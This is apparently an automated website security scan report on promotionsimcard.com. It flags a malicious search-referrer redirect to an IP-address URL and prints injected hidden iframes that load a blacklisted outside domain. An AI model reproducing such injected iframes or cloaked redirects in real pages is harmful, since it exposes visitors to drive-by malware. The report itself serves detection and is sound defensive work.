Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://promotionsimcard.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: promotionsimcard.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 19 Sep 2014 18:25:22 GMT Location: http://46.161.41.152/sds/go.php?sid=1 Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://promotionsimcard.com/ | 200 OK Content-Length: 48647 Content-Type: text/html | malicious |
Page code contains blacklisted domain: blast.cua55.com <iframe src="http://blast.cua55.com/Vl3ihNMokB/vaisoe"></iframe><iframe src="http://blast.cua55.com/Vl3ihNMokB/vaisoe"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="th" xmlns:og='http://opengraphprotocol.org/schema/' xmlns:fb='http://www.facebook.com/2008/fbml'> <head profile="http://gmpg.org/ ...[4091 bytes skipped]... Malicious iFrame found. src: http://blast.cua55.com/vl3ihnmokb/vaisoe This URL is marked by Google as suspicious <iframe src="http://blast.cua55.com/vl3ihnmokb/vaisoe"> | ||
http://promotionsimcard.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-content/plugins/jquery-drill-down-ipod-menu/js/jquery.cookie.js?ver=3.9.2 | 200 OK Content-Length: 4341 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-content/plugins/jquery-drill-down-ipod-menu/js/jquery.dcdrilldown.1.2.js?ver=3.9.2 | 200 OK Content-Length: 10631 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.hoverIntent.minified.js?ver=3.9.2 | 200 OK Content-Length: 1614 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-content/plugins/jquery-vertical-accordion-menu/js/jquery.dcjqaccordion.2.9.js?ver=3.9.2 | 200 OK Content-Length: 6982 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-content/plugins/slick-social-share-buttons/js/ga.social_tracking.js?ver=3.9.2 | 200 OK Content-Length: 4965 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-content/plugins/slick-social-share-buttons/js/jquery.social.float.1.3.js?ver=3.9.2 | 200 OK Content-Length: 10870 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-content/themes/Landa/lib/js/superfish.js?ver=3.9.2 | 200 OK Content-Length: 3714 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-content/plugins/static-random-posts-widget/js/static-random-posts.js?ver=1 | 200 OK Content-Length: 1858 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-content/themes/Landa/includes/featuredposts/scripts/jquery.cycle.all.js | 200 OK Content-Length: 51300 Content-Type: application/javascript | clean |
http://platform.twitter.com/widgets.js | 200 OK Content-Length: 100803 Content-Type: application/javascript | clean |
http://assets.pinterest.com/js/pinit.js | 200 OK Content-Length: 313 Content-Type: application/javascript | clean |
http://promotionsimcard.com/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=promotionsimcard.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://promotionsimcard.com/
Result: promotionsimcard.com is not infected or malware details are not published yet.
Result: promotionsimcard.com is not infected or malware details are not published yet.